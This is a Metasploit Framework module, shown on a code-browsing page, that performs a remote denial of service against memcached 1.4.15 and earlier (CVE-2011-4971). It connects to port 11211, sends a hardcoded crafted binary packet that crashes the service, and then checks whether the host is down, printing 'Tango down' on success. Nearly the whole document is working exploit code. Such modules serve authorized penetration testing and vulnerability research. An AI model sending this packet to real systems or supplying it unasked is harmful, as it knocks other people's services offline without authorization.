Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/misc/memcached.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Tcp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Memcached Remote Denial of Service',
15
'Description' => %q{
16
This module sends a specially-crafted packet to cause a
17
segmentation fault in memcached v1.4.15 or earlier versions.
18
},
19
'References' => [
20
[ 'URL', 'https://code.google.com/archive/p/memcached/issues/192' ],
21
[ 'CVE', '2011-4971' ],
22
[ 'OSVDB', '92867' ]
23
],
24
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
25
'License' => MSF_LICENSE,
26
'Notes' => {
27
'Stability' => [CRASH_SERVICE_DOWN],
28
'SideEffects' => [],
29
'Reliability' => []
30
}
31
)
32
)
33
34
register_options([Opt::RPORT(11211),])
35
end
36
37
def is_alive?
38
connect
39
disconnect
40
true
41
rescue Rex::ConnectionRefused
42
return false
43
end
44
45
def run
46
connect
47
pkt = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00"
48
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"
49
pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
50
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
51
52
print_status("#{rhost}:#{rport} - Sending dos packet...")
53
sock.put(pkt)
54
disconnect
55
56
print_status("#{rhost}:#{rport} - Checking host status...")
57
select(nil, nil, nil, 1)
58
59
if is_alive?
60
print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive")
61
else
62
print_good("#{rhost}:#{rport} - Tango down") # WWJS - What would th3j35t3r say?
63
end
64
end
65
end
66
67